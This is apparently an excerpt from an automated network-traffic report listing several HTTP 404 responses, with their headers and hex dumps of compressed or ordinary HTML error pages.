Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:07:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B9BYAb5vbW1K6nC6RV4oLXf16PUUuQXZfWNp%2BuEyOlPEOdo89STy8vh%2BorYzM27u9U6trgm3Lgfprxg28XYGrqoPf%2FzuEYHkFsB2d0a%2F%2BjzSxuN%2F9yZb1ZAI9Ro6Qn%2BgqjVO7ci51e2g4QgV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89ce84263eea8cd4-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:07:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u4pVlZTadzumTYubhaf45%2BwB%2FNrUygRG3bkw8VZLNM3tXwK%2BTlA00iq3qIhkI%2BUzQdD4cEG2XkKKVD4bt%2FeKFQGjGJvRZE9CqgCFT8qCPVgv80ZuozuWyEjN7wwfT21MMtJbYKKQ6u0n2Fnz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89ce843659f5437b-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/5.6.40content-type: text/html; charset=UTF-8content-length: 810content-encoding: brvary: Accept-Encodingdate: Tue, 02 Jul 2024 12:08:31 GMTserver: LiteSpeedData Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 d7 ce f1 a3 55 51 11 eb 5b 75 ab 6e c9 0a c3 c1 34 36 af 88 38 66 27 85 b7 59 a5 a8 0d 68 ca 6f f8 c5 a5 06 94 fc e1 e1 4a 22 3e 29 92 5a e0 ad 92 7a 16 1c 07 b3 50 be 91 13 b8 92 19 88 02 01 28 dd a0 57 a4 fe 44 cd 72 ba c5 ba b1 26 b5 1a 5a 27 f5 6c d9 4c 65 2a 5b 0d 48 b1 ef bf de 16 85 ac d9 da 2c 45 1d ea c2 a2 ef 69 c1 3d a0 c5 71 e4 07 e2 45 6b 84 cf 34 27 43 9e a6 fe 15 ea 69 38 ac ac f3 8b a1 42 8a b6 4f 70 3e 43 a5 1d e4 ed a9 19 9b 74 70 8d 4b c2 a9 29 b4 ca 82 44 d4 40 a5 6c dc de a8 e9 b2 8b a7 61 99 52 d3 65 97 c8 70 99 4d 78 ae 40 a6 6a 60 78 b7 56 85 14 af dd 48 16 21 44 ff e0 f9 7c 4e c2 6c c9 37 ce 26 61 c2 8a aa 32 de 05 47 f6 cb 3c ce 67 b4 08 1d 05 06 8b 0e 7a 72 e4 b1 6a 41 0a 18 25 cd 1a c1 15 d8 a7 58 24 44 9f fa fb 92 2a 6b 28 62 10 38 ae 7d e9 a5 e0 4f 0b 29 e0 fc 4b df d7 e4 8f 1d 8d 33 84 65 2e 7b 13 41 49 cb 64 a8 5a ec 0c 06 ca 5f 84 db 19 ce 54 c6 e2 d7 81 24 91 54 5e f7 16 c3 02 d3 cc 68 0d 3e 93 d5 d5 18 42 ef 2c 63 cf c7 8e be 4f bf 80 c5 d1 c0 e4 17 5a 36 9a f4 c1 72 42 93 7d 1c 51 16 10 62 93 14 6d f3 a4 cf 63 fd 67 d4 ce f1 aa 90 22 2d fc 06 fc f9 09 99 52 59 9c a9 ec 1a 62 78 67 68 c1 b3 d3 76 86 6c dc 69 bd 22 fd 46 39 90 9e 5b e6 29 e5 07 e6 46 9e ea 11 b3 4f d8 a7 58 80 1e 10 70 2c 0d db b9 6a cb c4 7e c3 3d ff fd 75 06 e7 71 c1 7d 00 ed 46 b2 f3 14 de 0e d6 f8 29 ca f7 e1 ce 04 da 05 46 5f 2d 88 51 00 9b 9a 0c ed 53 14 b7 36 0d 1e 71 69 cb e3 50 48 01 Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z xwR{z`px)0c(Eb%Wg`0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/5.6.40content-type: text/html; charset=UTF-8content-length: 810content-encoding: brvary: Accept-Encodingdate: Tue, 02 Jul 2024 12:08:34 GMTserver: LiteSpeedData Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 d7 ce f1 a3 55 51 11 eb 5b 75 ab 6e c9 0a c3 c1 34 36 af 88 38 66 27 85 b7 59 a5 a8 0d 68 ca 6f f8 c5 a5 06 94 fc e1 e1 4a 22 3e 29 92 5a e0 ad 92 7a 16 1c 07 b3 50 be 91 13 b8 92 19 88 02 01 28 dd a0 57 a4 fe 44 cd 72 ba c5 ba b1 26 b5 1a 5a 27 f5 6c d9 4c 65 2a 5b 0d 48 b1 ef bf de 16 85 ac d9 da 2c 45 1d ea c2 a2 ef 69 c1 3d a0 c5 71 e4 07 e2 45 6b 84 cf 34 27 43 9e a6 fe 15 ea 69 38 ac ac f3 8b a1 42 8a b6 4f 70 3e 43 a5 1d e4 ed a9 19 9b 74 70 8d 4b c2 a9 29 b4 ca 82 44 d4 40 a5 6c dc de a8 e9 b2 8b a7 61 99 52 d3 65 97 c8 70 99 4d 78 ae 40 a6 6a 60 78 b7 56 85 14 af dd 48 16 21 44 ff e0 f9 7c 4e c2 6c c9 37 ce 26 61 c2 8a aa 32 de 05 47 f6 cb 3c ce 67 b4 08 1d 05 06 8b 0e 7a 72 e4 b1 6a 41 0a 18 25 cd 1a c1 15 d8 a7 58 24 44 9f fa fb 92 2a 6b 28 62 10 38 ae 7d e9 a5 e0 4f 0b 29 e0 fc 4b df d7 e4 8f 1d 8d 33 84 65 2e 7b 13 41 49 cb 64 a8 5a ec 0c 06 ca 5f 84 db 19 ce 54 c6 e2 d7 81 24 91 54 5e f7 16 c3 02 d3 cc 68 0d 3e 93 d5 d5 18 42 ef 2c 63 cf c7 8e be 4f bf 80 c5 d1 c0 e4 17 5a 36 9a f4 c1 72 42 93 7d 1c 51 16 10 62 93 14 6d f3 a4 cf 63 fd 67 d4 ce f1 aa 90 22 2d fc 06 fc f9 09 99 52 59 9c a9 ec 1a 62 78 67 68 c1 b3 d3 76 86 6c dc 69 bd 22 fd 46 39 90 9e 5b e6 29 e5 07 e6 46 9e ea 11 b3 4f d8 a7 58 80 1e 10 70 2c 0d db b9 6a cb c4 7e c3 3d ff fd 75 06 e7 71 c1 7d 00 ed 46 b2 f3 14 de 0e d6 f8 29 ca f7 e1 ce 04 da 05 46 5f 2d 88 51 00 9b 9a 0c ed 53 14 b7 36 0d 1e 71 69 cb e3 50 48 01 Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z xwR{z`px)0c(Eb%Wg`0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/5.6.40content-type: text/html; charset=UTF-8content-length: 810content-encoding: brvary: Accept-Encodingdate: Tue, 02 Jul 2024 12:08:37 GMTserver: LiteSpeedData Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 d7 ce f1 a3 55 51 11 eb 5b 75 ab 6e c9 0a c3 c1 34 36 af 88 38 66 27 85 b7 59 a5 a8 0d 68 ca 6f f8 c5 a5 06 94 fc e1 e1 4a 22 3e 29 92 5a e0 ad 92 7a 16 1c 07 b3 50 be 91 13 b8 92 19 88 02 01 28 dd a0 57 a4 fe 44 cd 72 ba c5 ba b1 26 b5 1a 5a 27 f5 6c d9 4c 65 2a 5b 0d 48 b1 ef bf de 16 85 ac d9 da 2c 45 1d ea c2 a2 ef 69 c1 3d a0 c5 71 e4 07 e2 45 6b 84 cf 34 27 43 9e a6 fe 15 ea 69 38 ac ac f3 8b a1 42 8a b6 4f 70 3e 43 a5 1d e4 ed a9 19 9b 74 70 8d 4b c2 a9 29 b4 ca 82 44 d4 40 a5 6c dc de a8 e9 b2 8b a7 61 99 52 d3 65 97 c8 70 99 4d 78 ae 40 a6 6a 60 78 b7 56 85 14 af dd 48 16 21 44 ff e0 f9 7c 4e c2 6c c9 37 ce 26 61 c2 8a aa 32 de 05 47 f6 cb 3c ce 67 b4 08 1d 05 06 8b 0e 7a 72 e4 b1 6a 41 0a 18 25 cd 1a c1 15 d8 a7 58 24 44 9f fa fb 92 2a 6b 28 62 10 38 ae 7d e9 a5 e0 4f 0b 29 e0 fc 4b df d7 e4 8f 1d 8d 33 84 65 2e 7b 13 41 49 cb 64 a8 5a ec 0c 06 ca 5f 84 db 19 ce 54 c6 e2 d7 81 24 91 54 5e f7 16 c3 02 d3 cc 68 0d 3e 93 d5 d5 18 42 ef 2c 63 cf c7 8e be 4f bf 80 c5 d1 c0 e4 17 5a 36 9a f4 c1 72 42 93 7d 1c 51 16 10 62 93 14 6d f3 a4 cf 63 fd 67 d4 ce f1 aa 90 22 2d fc 06 fc f9 09 99 52 59 9c a9 ec 1a 62 78 67 68 c1 b3 d3 76 86 6c dc 69 bd 22 fd 46 39 90 9e 5b e6 29 e5 07 e6 46 9e ea 11 b3 4f d8 a7 58 80 1e 10 70 2c 0d db b9 6a cb c4 7e c3 3d ff fd 75 06 e7 71 c1 7d 00 ed 46 b2 f3 14 de 0e d6 f8 29 ca f7 e1 ce 04 da 05 46 5f 2d 88 51 00 9b 9a 0c ed 53 14 b7 36 0d 1e 71 69 cb e3 50 48 01 Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z xwR{z`px)0c(Eb%Wg`0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/5.6.40content-type: text/html; charset=UTF-8content-length: 2247date: Tue, 02 Jul 2024 12:08:39 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 70 6c 22 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 41 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 64 68 6f 73 74 69 6e 67 2e 70 6c 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 43 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 64 68 6f 73 74 69 6e 67 2e 70 6c 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 6c 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 64 68 6f 73 74 69 6e 67 2e 70 6c 20 2d 20 70 6f 64 20 74 79 6d 20 61 64 72 65 73 65 6d 20 6e 69 65 20 7a 6e 61 6a 64 75 6a 65 20 73 69 c4 99 20 c5 bc 61 64 65 6e 20 73 65 72 77 69 73 20 57 57 57 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 7b 0d 0a 66 6f 6e 74 3a 20 31 32 70 78 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 63 6f 6c 6f 72 3a 23 33 33 33 3b 0d 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0d 0a 7d 0d 0a 69 6d 67 7b 0d 0a 62 6f 72 64 65 72 3a 30 70 78 3b 0d 0a 7d 0d 0a 61 3a 68 6f 76 65 72 2c 20 61 3a 61 63 74 69 76 65 7b 0d 0a 63 6f 6c 6f 72 3a 23 30 30 30 3b 0d 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 0d 0a 7d 0d 0a 23 74 72 65 73 63 7b 0d 0a 66 6f 6e 74 3a 20 31 32 70 78 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 7d 0d 0a 23 66 6f 6f 74 7b 0d 0a 66 6f 6e 74 3a 20 31 30 70 78 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 63 6f 6c 6f 72 3a 23 36 30 36 30 36 30 3b 0d 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 0d 0a 62 6f 74 74 6f 6d 3a 35 70 78 3b 0d 0a 77 69 64 74 68 3a 39 39 25 3b 0d 0a 7d 0d 0a 0d 0a 2e 66 3a 6c 69 6e 6b 2c 20 2e 66 3
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:08:58 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:09:01 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
